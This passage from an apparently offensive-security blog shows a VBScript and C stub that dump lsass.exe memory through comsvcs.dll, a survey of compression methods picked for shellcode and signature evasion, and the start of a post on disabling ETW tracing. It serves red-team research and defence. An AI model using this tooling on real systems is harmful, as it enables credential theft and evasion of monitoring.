        printf("Invoking COMSVCS!MiniDumpW(\"%ws\")\n", argv[1]);
       
        // dump process
        MiniDumpW(0, 0,  argv[1]);
        printf("OK!\n");
        
        return 0;
    }
    

    Since neither rundll32 nor comsvcs!MiniDumpW will enable the debugging privilege required to access lsass.exe, the following VBScript will work in an elevated process.

    Option Explicit
    
    Const SW_HIDE = 0
    
    If (WScript.Arguments.Count <> 1) Then
        WScript.StdOut.WriteLine("procdump - Copyright (c) 2019 odzhan")
        WScript.StdOut.WriteLine("Usage: procdump <process>")
        WScript.Quit
    Else
        Dim fso, svc, list, proc, startup, cfg, pid, str, cmd, query, dmp
        
        ' get process id or name
        pid = WScript.Arguments(0)
        
        ' connect with debug privilege
        Set fso  = CreateObject("Scripting.FileSystemObject")
        Set svc  = GetObject("WINMGMTS:{impersonationLevel=impersonate, (Debug)}")
        
        ' if not a number
        If(Not IsNumeric(pid)) Then
          query = "Name"
        Else
          query = "ProcessId"
        End If
        
        ' try find it
        Set list = svc.ExecQuery("SELECT * From Win32_Process Where " & _
          query & " = '" & pid & "'")
        
        If (list.Count = 0) Then
          WScript.StdOut.WriteLine("Can't find active process : " & pid)
          WScript.Quit()
        End If
    
        For Each proc in list
          pid = proc.ProcessId
          str = proc.Name
          Exit For
        Next
    
        dmp = fso.GetBaseName(str) & ".bin"
        
        ' if dump file already exists, try to remove it
        If(fso.FileExists(dmp)) Then
          WScript.StdOut.WriteLine("Removing " & dmp)
          fso.DeleteFile(dmp)
        End If
        
        WScript.StdOut.WriteLine("Attempting to dump memory from " & _
          str & ":" & pid & " to " & dmp)
        
        Set proc       = svc.Get("Win32_Process")
        Set startup    = svc.Get("Win32_ProcessStartup")
        Set cfg        = startup.SpawnInstance_
        cfg.ShowWindow = SW_HIDE
    
        cmd = "rundll32 C:\windows\system32\comsvcs.dll, MiniDump " & _
              pid & " " & fso.GetAbsolutePathName(".") & "\" & _
              dmp & " full"
        
        Call proc.Create (cmd, null, cfg, pid)
        
        ' sleep for a second
        Wscript.Sleep(1000)
        
        If(fso.FileExists(dmp)) Then
          WScript.StdOut.WriteLine("Memory saved to " & dmp)
        Else
          WScript.StdOut.WriteLine("Something went wrong.")
        End If
    End If
    

    Run it from an elevated command prompt.

    No idea how useful this could be, but since it’s part of the operating system, it’s probably worth knowing anyway. Perhaps you will find similar functions in signed binaries that perform memory dumping of a target process. 🙂

    odzhan

    Shellcode: Data Compression

    By: odzhan
    8 December 2019 at 15:00

    Introduction

    This post examines data compression algorithms suitable for position-independent code and assumes you’re already familiar with the concept and purpose of data compression. For those of you curious to know more about the science, or information theory, read Data Compression Explained by Matt Mahoney. For historical perspective, read History of Lossless Data Compression Algorithms. Charles Bloom has a great blog on the subject that goes way over my head. For questions and discussions, Encode’s Forum is popular among experts and should be able to help with any queries you have.

    For shellcode, algorithms are assessed against the following criteria:

    1. Compact decompressor.
    2. Good compression ratio.
    3. Portable across operating systems and architectures.
    4. Difficult to detect by signature.
    5. Unencumbered by patents and licensing.

    Meeting the requirements isn’t that easy. Search for “lightweight compression algorithms” and you’ll soon find recommendations for algorithms that aren’t compact at all. It’s not an issue on machines with 1TB hard drives of course. It’s a problem for resource-constrained environments like microcontrollers and wireless sensors. The best algorithms are usually optimized for speed. They contain arrays and constants that allow them to be easily identified with signature-based tools.
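
    To make the point about signatures concrete, here is a minimal sketch of how a scanner might spot a well-known constant inside a blob. It is a naive byte search, not how any particular product works, and find_signature and crc32_sig are names invented for this example. The constant is the second entry of the standard CRC-32 lookup table, chosen only because table-driven code embeds it verbatim.

```c
#include <stddef.h>
#include <string.h>

/* Return the offset of the first occurrence of sig in buf, or -1. */
static long find_signature(const unsigned char *buf, size_t len,
                           const unsigned char *sig, size_t siglen) {
    if (siglen == 0 || siglen > len) return -1;
    for (size_t i = 0; i + siglen <= len; i++) {
        if (memcmp(buf + i, sig, siglen) == 0) return (long)i;
    }
    return -1;
}

/* 0x77073096, the second entry of the standard CRC-32 table, stored
 * little-endian. Used here purely as an example of a telltale constant. */
static const unsigned char crc32_sig[4] = { 0x96, 0x30, 0x07, 0x77 };
```

    A decompressor that avoids large tables and distinctive constants gives this kind of search nothing obvious to match on, which is one reason compact bit-oriented decoders are attractive for shellcode.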

    Algorithms that are compact might have suboptimal compression ratios, or the compressor component may be closed source or restricted by licensing. There is light at the end of the tunnel, however, thanks primarily to the efforts of those designing executable compression. First, we look at those algorithms and then at which Windows API can be used as an alternative. There are also open source libraries designed for interoperability that support Windows compression on other platforms like Linux.

    Table of contents

    1. Executable Compression
    2. Windows NT Layer DLL
    3. Windows Compression API
    4. Windows Packaging API
    5. Windows Imaging API
    6. Direct3D HLSL Compiler
    7. Windows-internal libarchive library
    8. LibreSSL Cryptography Library
    9. Windows.Storage.Compression
    10. Windows Undocumented API
    11. Summary

    1. Executable Compression

    The first tool known to compress executables and save disk space was Realia SpaceMaker published sometime in 1982 by Robert Dewar. The first virus known to use compression in its infection routine was Cruncher published in June 1993. The author of Cruncher used routines from the disk reduction utility for DOS called DIET. Later on, many different viruses utilized compression as part of their infection routine to reduce the size of infected files, presumably to help evade detection longer. Although completely unrelated to shellcode, I decided to look at e-zines from twenty years ago when there was a lot of interest in using lightweight compression algorithms.

    The following list of viruses used compression back in the late 90s/early 00s. It’s not an extensive list, as I only searched the more popular e-zines like 29A and Xine by iKX.

    • Redemption, by Jacky Qwerty/29A
    • Inca, Hybris, by Vecna/29A
    • Aldebaran, by Bozo/iKX
    • Legacy, Thorin, Rhapsody, Forever, by Billy Belcebu/iKX
    • BeGemot, HIV, Vulcano, Benny, Milennium, by Benny/29A
    • Junkmail, Junkhtmail, by roy g biv/29A/defjam

    The following compression engines were examined. A 1MB EXE file was used as the raw data and not all of them were tested.

    BCE that appeared in 29a#4 was disappointing with only an 8% compression ratio. BNCE that appeared in DCA#1 was no better at 9%, although the decompressor is only 54 bytes. The decompressor for LSCE is 25 bytes, but the compressor simply encodes repeated sequences of zero and nothing else. JQCoding has a ~20% compression ratio while LZCE provides the best at 36%. With the exception of the last two mentioned, I was unable to find anything in the e-zines with a good compression ratio. They were super tiny, but also super eh..inefficient. Worth a mention is KITTY, by snowcat.
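
    To give an idea of what an encoder that only handles runs of zero looks like, and why its ratio depends entirely on how many zero bytes the input contains, here is a minimal sketch in portable C. The byte format (a zero byte followed by a run length of 1 to 255) is an assumption made for this example and is not the actual LSCE format. saving_percent assumes the ratios quoted in this post mean space saved relative to the original size.

```c
#include <stddef.h>
#include <stdint.h>

/* Encode: non-zero bytes are copied as-is; a run of 1-255 zero bytes
 * becomes the pair {0x00, run length}. Returns the number of bytes
 * written, or 0 if out is too small (also 0 for empty input). */
static size_t zrle_pack(const uint8_t *in, size_t inlen,
                        uint8_t *out, size_t outcap) {
    size_t i = 0, o = 0;
    while (i < inlen) {
        if (in[i] != 0) {
            if (o + 1 > outcap) return 0;
            out[o++] = in[i++];
        } else {
            size_t run = 0;
            while (i < inlen && in[i] == 0 && run < 255) { i++; run++; }
            if (o + 2 > outcap) return 0;
            out[o++] = 0;
            out[o++] = (uint8_t)run;
        }
    }
    return o;
}

/* Decode the format above. Returns bytes written, or 0 on malformed
 * input or insufficient output space. */
static size_t zrle_unpack(const uint8_t *in, size_t inlen,
                          uint8_t *out, size_t outcap) {
    size_t i = 0, o = 0;
    while (i < inlen) {
        if (in[i] != 0) {
            if (o + 1 > outcap) return 0;
            out[o++] = in[i++];
        } else {
            if (i + 1 >= inlen) return 0;          /* truncated pair */
            size_t run = in[i + 1];
            if (run == 0 || o + run > outcap) return 0;
            for (size_t k = 0; k < run; k++) out[o++] = 0;
            i += 2;
        }
    }
    return o;
}

/* Space saved as a percentage of the original size. */
static double saving_percent(size_t original, size_t packed) {
    if (original == 0) return 0.0;
    return 100.0 * (1.0 - (double)packed / (double)original);
}
```

    With this format an input with few zero bytes barely shrinks, and every isolated zero actually grows by one byte, which is consistent with the poor ratios seen from the simplest engines.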

    While I could be wrong, the earliest example of compression being used to unpack shellcode can be found in a generator written by Z0MBiE/29A in 2004 (shown in figure 1). NRV compression algorithms, similar to what’s used in UPX, were re-purposed to decompress the shellcode (see freenrv2 for more details).

    Figure 1: Shellcode constructor by Z0MBiE/29A

    UPX is a very popular tool for executable compression based on UCL. Included with the source is a PE packer example called UCLpack (thanks Peter) which is ideal for shellcode, too. aPLib also provides good compression ratio and the decompressor doesn’t contain lots of unique constants that would assist in detection by signature. The problem is that the compressor isn’t open source and requires linking with static or dynamic libraries compiled by the author. Thankfully, an open-source implementation by Emmanuel Marty is available and this is also ideal for shellcode.

    Other libraries worth mentioning that I didn’t think were entirely suitable are Tiny Inflate and uzlib. The rest of this post focuses on compression provided by various Windows API.

    2. Windows NT Layer DLL

    Used by the Sofacy group to decompress a payload, RtlDecompressBuffer is also popular for PE Packers and in-memory execution. rtlcompress.c demonstrates using the API.

    • Compression

    Obtain the size of the workspace required for compression via the RtlGetCompressionWorkSpaceSize API. Allocate memory for the compressed data and pass both memory buffer and the raw data to RtlCompressBuffer. The following example in C demonstrates this.

    DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {      
        ULONG                            wspace, fspace;
        SIZE_T                           outlen = 0;
        DWORD                            len;
        NTSTATUS                         nts;
        PVOID                            ws, outbuf;
        HMODULE                          m;
        RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
        RtlCompressBuffer_t              RtlCompressBuffer;
          
        m = GetModuleHandle("ntdll");
        RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
        RtlCompressBuffer              = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
            
        if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
          printf("Unable to resolve RTL API\n");
          return 0;
        }
            
        // 1. obtain the size of workspace
        nts = RtlGetCompressionWorkSpaceSize(
          engine | COMPRESSION_ENGINE_MAXIMUM, 
          &wspace, &fspace);
              
        if(nts == 0) {
          // 2. allocate memory for workspace
          ws = malloc(wspace); 
          if(ws != NULL) {
            // 3. allocate memory for output 
            outbuf = malloc(inlen);
            if(outbuf != NULL) {
              // 4. compress data
              nts = RtlCompressBuffer(
                engine | COMPRESSION_ENGINE_MAXIMUM, 
                inbuf, inlen, outbuf, inlen, 0, 
                (PULONG)&outlen, ws); 
                  
              if(nts == 0) {
                // 5. write the original length
                WriteFile(outfile, &inlen, sizeof(DWORD), &len, 0);
                // 6. write compressed data to file
                WriteFile(outfile, outbuf, outlen, &len, 0);
              }
              // 7. free output buffer
              free(outbuf);
            }
            // 8. free workspace
            free(ws);
          }
        }
        return outlen;
    }
    
    • Decompression

    LZNT1 and Xpress data can be unpacked using RtlDecompressBuffer. However, Xpress Huffman data can only be unpacked using RtlDecompressBufferEx or the multi-threaded RtlDecompressBufferEx2. The last two require a WorkSpace buffer.

    typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
      USHORT                 CompressionFormatAndEngine,
      PUCHAR                 UncompressedBuffer,
      ULONG                  UncompressedBufferSize,
      PUCHAR                 CompressedBuffer,
      ULONG                  CompressedBufferSize,
      PULONG                 FinalUncompressedSize,
      PVOID                  WorkSpace);
          
    DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        ULONG                            wspace, fspace;
        SIZE_T                           outlen = 0;
        DWORD                            len;
        NTSTATUS                         nts;
        PVOID                            ws, outbuf;
        HMODULE                          m;
        RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
        RtlDecompressBufferEx_t          RtlDecompressBufferEx;
          
        m = GetModuleHandle("ntdll");
        RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
        RtlDecompressBufferEx          = (RtlDecompressBufferEx_t)GetProcAddress(m, "RtlDecompressBufferEx");
            
        if(RtlGetCompressionWorkSpaceSize == NULL || RtlDecompressBufferEx == NULL) {
          printf("Unable to resolve RTL API\n");
          return 0;
        }
            
        // the input must at least hold the original length
        if(inlen < sizeof(DWORD)) return 0;
            
        // 1. obtain the size of workspace
        nts = RtlGetCompressionWorkSpaceSize(
          engine | COMPRESSION_ENGINE_MAXIMUM, 
          &wspace, &fspace);
              
        if(nts == 0) {
          // 2. allocate memory for workspace
          ws = malloc(wspace); 
          if(ws != NULL) {
            // 3. allocate memory for output
            outlen = *(DWORD*)inbuf;
            outbuf = malloc(outlen);
            
            if(outbuf != NULL) {
              // 4. decompress data
              nts = RtlDecompressBufferEx(
                engine | COMPRESSION_ENGINE_MAXIMUM, 
                outbuf, outlen, 
                (PBYTE)inbuf + sizeof(DWORD), inlen - sizeof(DWORD), 
                (PULONG)&outlen, ws); 
                  
              if(nts == 0) {
                // 5. write decompressed data to file
                WriteFile(outfile, outbuf, outlen, &len, 0);
              } else {
                printf("RtlDecompressBufferEx failed with %08lx\n", nts);
              }
              // 6. free output buffer
              free(outbuf);
            } else {
              printf("malloc() failed\n");
            }
            // 7. free workspace
            free(ws);
          }
        }
        return outlen;
    }
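
    Both routines above rely on a simple container: the original length stored as a 32-bit value, followed by the compressed bytes. The sketch below shows that framing in portable C with an explicit little-endian header, which is what a DWORD written on Windows amounts to. frame_write and frame_read are hypothetical helpers, not part of rtlcompress.c.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FRAME_HDR 4u  /* size of the 32-bit length prefix */

/* Write the header followed by the packed bytes into out.
 * Returns the total number of bytes written, or 0 if out is too small. */
static size_t frame_write(uint32_t original_len,
                          const uint8_t *packed, size_t packed_len,
                          uint8_t *out, size_t outcap) {
    if (outcap < FRAME_HDR || packed_len > outcap - FRAME_HDR) return 0;
    out[0] = (uint8_t)(original_len);
    out[1] = (uint8_t)(original_len >> 8);
    out[2] = (uint8_t)(original_len >> 16);
    out[3] = (uint8_t)(original_len >> 24);
    memcpy(out + FRAME_HDR, packed, packed_len);
    return FRAME_HDR + packed_len;
}

/* Parse a frame without copying. Returns 1 on success, or 0 if the
 * input is too short to contain the header. */
static int frame_read(const uint8_t *in, size_t inlen,
                      uint32_t *original_len,
                      const uint8_t **packed, size_t *packed_len) {
    if (inlen < FRAME_HDR) return 0;
    *original_len = ((uint32_t)in[0])       |
                    ((uint32_t)in[1] << 8)  |
                    ((uint32_t)in[2] << 16) |
                    ((uint32_t)in[3] << 24);
    *packed     = in + FRAME_HDR;
    *packed_len = inlen - FRAME_HDR;
    return 1;
}
```

    A decoder should treat original_len as untrusted input and cap it to a sane maximum before allocating the output buffer.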
    

    3. Windows Compression API

    Despite being well documented and offering better compression ratios than RtlCompressBuffer, it’s unusual to see these API used at all. Four engines are supported: MSZIP, Xpress, Xpress Huffman and LZMS. xpress.c demonstrates using these API.

    Compression

    DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        COMPRESSOR_HANDLE ch = NULL;
        BOOL              r;
        SIZE_T            outlen, len;
        LPVOID            outbuf;
        DWORD             wr;
        
        // Create a compressor
        r = CreateCompressor(engine, NULL, &ch);
        
        if(r) {    
          // Query compressed buffer size.
          Compress(ch, inbuf, inlen, NULL, 0, &len);      
          if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
            // allocate memory for compressed data
            outbuf = malloc(len);
            if(outbuf != NULL) {
              // Compress data and write data to outbuf.
              r = Compress(ch, inbuf, inlen, outbuf, len, &outlen);
              // if compressed ok, write to file
              if(r) {
                WriteFile(outfile, outbuf, outlen, &wr, NULL);
              } else xstrerror("Compress()");
              free(outbuf);
            } else xstrerror("malloc()");
          } else xstrerror("Compress()");
          CloseCompressor(ch);
        } else xstrerror("CreateCompressor()");
        return r;
    }
    

    Decompression

    DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        DECOMPRESSOR_HANDLE dh = NULL;
        BOOL                r;
        SIZE_T              outlen, len;
        LPVOID              outbuf;
        DWORD               wr;
        
        // Create a decompressor
        r = CreateDecompressor(engine, NULL, &dh);
        
        if(r) {    
          // Query Decompressed buffer size.
          Decompress(dh, inbuf, inlen, NULL, 0, &len);      
          if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
            // allocate memory for decompressed data
            outbuf = malloc(len);
            if(outbuf != NULL) {
              // Decompress data and write data to outbuf.
              r = Decompress(dh, inbuf, inlen, outbuf, len, &outlen);
              // if decompressed ok, write to file
              if(r) {
                WriteFile(outfile, outbuf, outlen, &wr, NULL);
              } else xstrerror("Decompress()");
              free(outbuf);
            } else xstrerror("malloc()");
          } else xstrerror("Decompress()");
          CloseDecompressor(dh);
        } else xstrerror("CreateDecompressor()");
        return r;
    }
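
    Both functions use the same two-call idiom: call once with no output buffer to learn the required size, allocate, then call again. The sketch below shows the idiom with the standard C snprintf function rather than the Compression API, so it can be compiled anywhere. format_alloc is a name invented for this example.

```c
#include <stdio.h>
#include <stdlib.h>

/* Format "<label>=<value>" into a freshly allocated string.
 * The caller frees the result; NULL is returned on failure. */
static char *format_alloc(const char *label, unsigned value) {
    /* 1. query: a NULL buffer of size 0 only reports the length needed */
    int need = snprintf(NULL, 0, "%s=%u", label, value);
    if (need < 0) return NULL;

    /* 2. allocate, leaving room for the terminating NUL */
    char *buf = malloc((size_t)need + 1);
    if (buf == NULL) return NULL;

    /* 3. repeat the call with a real buffer */
    if (snprintf(buf, (size_t)need + 1, "%s=%u", label, value) != need) {
        free(buf);
        return NULL;
    }
    return buf;
}
```

    The difference with Compress and Decompress is only in how the size is reported: they fail with ERROR_INSUFFICIENT_BUFFER and return the required length through the last parameter, as the code above shows.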
    

    4. Windows Packaging API

    If you’re a developer that wants to sell a Windows application to customers on the Microsoft Store, you must submit a package that uses the Open Packaging Conventions (OPC) format. Visual Studio automates building packages (.msix or .appx) and bundles (.msixbundle or .appxbundle). There’s also a well documented interface (IAppxFactory) that allows building them manually. While not intended to be used specifically for compression, there’s no reason why you can’t. An SDK sample to extract the contents of packages uses SHCreateStreamOnFileEx to read the package from disk. However, you can also use SHCreateMemStream and decompress a package entirely in memory.

    5. Windows Imaging API (WIM)

    These encode and decode .wim files on disk. WIMCreateFile internally calls CreateFile to return a file handle to an archive, which is then used with WIMCaptureImage to compress and add files to the archive. From what I can tell, there’s no way to work with .wim files in memory using these APIs.

    For Linux, the Windows Imaging (WIM) library supports Xpress, LZX and LZMS algorithms. libmspack and this repo provide good information on the various compression algorithms supported by Windows.

    6. Direct3D HLSL Compiler

    Believe it or not, the best compression ratio on Windows is provided by the Direct3D API. Internally, it uses the DXT/Block Compression (BC) algorithms, which are designed specifically for textures/images. In my tests, they compressed better than anything else available on Windows: the compression ratio was 60% for a 1MB EXE file, and using the API is very easy. The following example in C uses D3DCompressShaders and D3DDecompressShaders. While untested, I believe the OpenGL API could likely be used in a similar way.

    Compression

    #pragma comment(lib, "D3DCompiler.lib")
    #include <windows.h>
    #include <stdint.h>
    #include <d3dcompiler.h>
    uint32_t d3d_compress(const void *inbuf, uint32_t inlen) {
        
        D3D_SHADER_DATA dsa;
        HRESULT         hr;
        ID3DBlob        *blob;
        SIZE_T          outlen = 0;
        LPVOID          outbuf;
        HANDLE          file;
        DWORD           len;
        
        file = CreateFile("compressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if(file == INVALID_HANDLE_VALUE) return 0;
        
        dsa.pBytecode      = inbuf;
        dsa.BytecodeLength = inlen;
        
        // compress data
        hr = D3DCompressShaders(1, &dsa, D3D_COMPRESS_SHADER_KEEP_ALL_PARTS, &blob);
        if(hr == S_OK) {
          // write to file
          outlen = blob->lpVtbl->GetBufferSize(blob);
          outbuf = blob->lpVtbl->GetBufferPointer(blob);
          
          WriteFile(file, outbuf, outlen, &len, 0);
          blob->lpVtbl->Release(blob);
        }
        CloseHandle(file);
        return outlen;
    }
    

    Decompression

    uint32_t d3d_decompress(const void *inbuf, uint32_t inlen) {
        HRESULT         hr;
        ID3DBlob        *blob;
        SIZE_T          outlen = 0;
        LPVOID          outbuf;
        HANDLE          file;
        DWORD           len;
        
        // create file to save decompressed data to
        file = CreateFile("decompressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if(file == INVALID_HANDLE_VALUE) return 0;
        
        // decompress buffer (the compressed blob is passed directly,
        // so no D3D_SHADER_DATA descriptor is needed here)
        hr = D3DDecompressShaders(inbuf, inlen, 1, 0, 0, 0, &blob, NULL);
        if(hr == S_OK) {
          // write to file
          outlen = blob->lpVtbl->GetBufferSize(blob);
          outbuf = blob->lpVtbl->GetBufferPointer(blob);
          
          WriteFile(file, outbuf, outlen, &len, 0);
          blob->lpVtbl->Release(blob);
        }
        CloseHandle(file);
        return outlen;    
    }
    

    The main problem with dynamically resolving these APIs is knowing which version is installed. The file name on my Windows 10 system is “D3DCompiler_47.dll”. It will likely be different on legacy systems.

    7. Windows-internal libarchive library

    Since the release of Windows 10 build 17063, the tape archiving tool ‘bsdtar’ is available and uses a stripped down version of the open source Multi-format archive and compression library to create and extract compressed files both in memory and on disk. The version found on Windows supports the bzip2, compress and gzip formats. Although bsdtar advertises support for xz, lzma and lzip, they appear to be unsupported, at least on my system.

    8. LibreSSL Cryptography Library

    Windows 10 Fall Creators Update and Windows Server 1709 include support for an OpenSSH client and server. The crypto library used by this port appears to have been compiled from the LibreSSL project, and if available can be found in C:\Windows\System32\libcrypto.dll. As some of you know, Transport Layer Security (TLS) supports compression prior to encryption. LibreSSL supports the ZLib and RLE methods, so it’s entirely possible to use COMP_compress_block and COMP_expand_block to compress and decompress raw data in memory.

    9. Windows.Storage.Compression

    This namespace located in Windows.Storage.Compress.dll internally uses Windows Compression API. CreateCompressor is invoked with the COMPRESS_RAW flag set. It also invokes SetCompressorInformation with COMPRESS_INFORMATION_CLASS_BLOCK_SIZE flag if the user specifies one in the Compressor method.

    10. Windows Undocumented API

    DLLs on Windows use the DEFLATE algorithm extensively to support various audio, video, image encoders/decoders and file archives. Normally, the deflate routines are used internally and can’t be resolved dynamically via GetProcAddress. However, at least between Windows 7 and 10, there is a DLL called PresentationNative_v0300.dll in the C:\Windows\System32 directory. (There may also be PresentationNative_v0400.dll, but I haven’t investigated this thoroughly.) Four public symbols grabbed my attention: ums_deflate_init, ums_deflate, ums_inflate_init and ums_inflate. For a PoC demonstrating how to use them, see winflate.c.

    Compression

    The following code uses zlib.h to compress a buffer and write to file.

    DWORD CompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        SIZE_T             outlen, len;
        LPVOID             outbuf;
        DWORD              wr;
        HMODULE            m;
        z_stream           ds;
        ums_deflate_t      ums_deflate;
        ums_deflate_init_t ums_deflate_init;
        int                err;
        
        m = LoadLibrary("PresentationNative_v0300.dll");
        ums_deflate_init = (ums_deflate_init_t)GetProcAddress(m, "ums_deflate_init");
        ums_deflate      = (ums_deflate_t)GetProcAddress(m, "ums_deflate");
        
        if(ums_deflate_init == NULL || ums_deflate == NULL) {
          printf("  [ unable to resolve deflate API.\n");
          return 0;
        }
        // allocate memory for compressed data
        outbuf = malloc(inlen);
        if(outbuf != NULL) {
          // Compress data and write data to outbuf.
          ds.zalloc    = Z_NULL;
          ds.zfree     = Z_NULL;
          ds.opaque    = Z_NULL;
          ds.avail_in  = (uInt)inlen;       // size of input
          ds.next_in   = (Bytef *)inbuf;    // input buffer
          ds.avail_out = (uInt)inlen;       // size of output buffer
          ds.next_out  = (Bytef *)outbuf;   // output buffer
          
          if(ums_deflate_init(&ds, Z_BEST_COMPRESSION, "1", sizeof(ds)) == Z_OK) {
            if((err = ums_deflate(&ds, Z_FINISH)) == Z_STREAM_END) {
              // write the original length first
              WriteFile(outfile, &inlen, sizeof(DWORD), &wr, NULL);
              // then the data
              // (total_out is the number of bytes produced; avail_out is
              // only the space left in the output buffer)
              WriteFile(outfile, outbuf, (DWORD)ds.total_out, &wr, NULL);
              FlushFileBuffers(outfile);
            } else {
              printf("  [ ums_deflate() : %x\n", err);
            }
          } else {
            printf("  [ ums_deflate_init()\n");
          }
          free(outbuf);
        }
        return 0;
    }
    

    Decompression

    Inflating/decompressing the data is based on an example using zlib.

    DWORD DecompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        SIZE_T             outlen, len;
        LPVOID             outbuf;
        DWORD              wr;
        HMODULE            m;
        z_stream           ds;
        ums_inflate_t      ums_inflate;
        ums_inflate_init_t ums_inflate_init;
        
        m = LoadLibrary("PresentationNative_v0300.dll");
        ums_inflate_init = (ums_inflate_init_t)GetProcAddress(m, "ums_inflate_init");
        ums_inflate      = (ums_inflate_t)GetProcAddress(m, "ums_inflate");
        
        if(ums_inflate_init == NULL || ums_inflate == NULL) {
          printf("  [ unable to resolve inflate API.\n");
          return 0;
        }
        // allocate memory for decompressed data
        outlen = *(DWORD*)inbuf;
        outbuf = malloc(outlen*2);
        
        if(outbuf != NULL) {
          // decompress data and write data to outbuf.
          ds.zalloc    = Z_NULL;
          ds.zfree     = Z_NULL;
          ds.opaque    = Z_NULL;
          ds.avail_in  = (uInt)inlen - 4;       // size of input, minus the 4-byte length prefix
          ds.next_in   = (Bytef*)inbuf + 4;     // input buffer
          ds.avail_out = (uInt)outlen*2;        // size of output buffer
          ds.next_out  = (Bytef*)outbuf;        // output buffer
          
          printf("  [ initializing inflate...\n");
          if(ums_inflate_init(&ds, "1", sizeof(ds)) == Z_OK) {
            printf("  [ inflating...\n");
            if(ums_inflate(&ds, Z_FINISH) == Z_STREAM_END) {
              // total_out is the number of decompressed bytes produced
              WriteFile(outfile, outbuf, (DWORD)ds.total_out, &wr, NULL);
              FlushFileBuffers(outfile);
            } else {
              printf("  [ ums_inflate()\n");
            }
          } else {
            printf("  [ ums_inflate_init()\n");
          }
          free(outbuf);
        } else {
          printf("  [ malloc()\n");
        }
        return 0;
    }
    

    11. Summary/Results

    That sums up the algorithms I think are suitable for shellcode. For the moment, UCL and apultra seem to provide the best solution. Using the Windows API is a good option, but the calls are susceptible to monitoring and may not be portable. One area I didn’t cover due to time is the Media Foundation API. It may be possible to use audio, video and image encoders to compress raw data and the decoders to decompress. Worth researching?

    Library / API         Algorithm / Engine    Compression Ratio
    RtlCompressBuffer     LZNT1                 39%
    RtlCompressBuffer     Xpress                47%
    RtlCompressBuffer     Xpress Huffman        53%
    Compress              MSZIP                 55%
    Compress              Xpress                40%
    Compress              Xpress Huffman        48%
    Compress              LZMS                  58%
    D3DCompressShaders    DXT/BC                60%
    aPLib                 N/A                   45%
    UCL                   N/A                   42%
    Undocumented API      DEFLATE               46%

    Another method of bypassing ETW and Process Injection via ETW registration entries.

    By: odzhan
    8 April 2020 at 18:00

    Contents

    1. Introduction
    2. Registering Providers
    3. Locating the Registration Table
    4. Parsing the Registration Table
    5. Code Redirection
    6. Disable Tracing
    7. Further Research

    1. Introduction

    This post briefly describes some techniques used by Red Teams to disrupt detection of malicious activity by the Event Tracing facility for Windows (ETW). It’s relatively easy to find information about registered ETW providers in memory and use it to disable tracing or perform code redirection. Since 2012, wincheck provides an option to list ETW registrations, so what’s discussed here isn’t all that new. Rather than explaining how ETW works and what it is for, I refer you to a list of links here. For this post, I took inspiration from Hiding your .NET – ETW by Adam Chester, which includes a PoC for EtwEventWrite. There’s also a PoC called TamperETW, by Cornelis de Plaa. A PoC to accompany this post can be found here.

    2. Registering Providers

    At a high-level, providers register using the advapi32!EventRegister API, which is usually forwarded to ntdll!EtwEventRegister. This API validates arguments and forwards them to ntdll!EtwNotificationRegister. The caller provides a unique GUID that normally represents a well-known provider on the system, an optional callback function and an optional callback context.

    A registration handle is the memory address of an entry combined with its table index shifted left by 48 bits. The handle may be used later with EventUnregister to disable tracing. The main functions of interest to us are those responsible for creating registration entries and storing them in memory. ntdll!EtwpAllocateRegistration tells us the size of the structure is 256 bytes. Functions that read and write entries tell us what most of the fields are used for.

    typedef struct _ETW_USER_REG_ENTRY {
        RTL_BALANCED_NODE   RegList;           // List of registration entries
        ULONG64             Padding1;
        GUID                ProviderId;        // GUID to identify Provider
        PETWENABLECALLBACK  Callback;          // Callback function executed in response to NtControlTrace
        PVOID               CallbackContext;   // Optional context
        SRWLOCK             RegLock;           // 
        SRWLOCK             NodeLock;          // 
        HANDLE              Thread;            // Handle of thread for callback
        HANDLE              ReplyHandle;       // Used to communicate with the kernel via NtTraceEvent
        USHORT              RegIndex;          // Index in EtwpRegistrationTable
        USHORT              RegType;           // 14th bit indicates a private provider
        ULONG64             Unknown[19];
    } ETW_USER_REG_ENTRY, *PETW_USER_REG_ENTRY;
    

    ntdll!EtwpInsertRegistration tells us where all the entries are stored. For Windows 10, they can be found in a global variable called ntdll!EtwpRegistrationTable.
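
    The 256-byte size reported by ntdll!EtwpAllocateRegistration can be cross-checked against the structure above. The following is a minimal sketch in portable C that assumes a typical 64-bit ABI. The stand-in types (NODE64, GUID128, REG_ENTRY64) and both helper functions are hypothetical; they only mirror the sizes of the Windows types and are not taken from any SDK header.

```c
#include <stddef.h>
#include <stdint.h>

/* Stand-in for RTL_BALANCED_NODE: three pointer-sized fields (assumption). */
typedef struct { uint64_t Children[2]; uint64_t ParentValue; } NODE64;

/* Stand-in for GUID: 16 bytes. */
typedef struct { uint32_t Data1; uint16_t Data2, Data3; uint8_t Data4[8]; } GUID128;

/* Same field order as ETW_USER_REG_ENTRY, with pointers, handles and
   SRW locks modelled as 64-bit integers. */
typedef struct {
    NODE64   RegList;
    uint64_t Padding1;
    GUID128  ProviderId;
    uint64_t Callback;
    uint64_t CallbackContext;
    uint64_t RegLock;
    uint64_t NodeLock;
    uint64_t Thread;
    uint64_t ReplyHandle;
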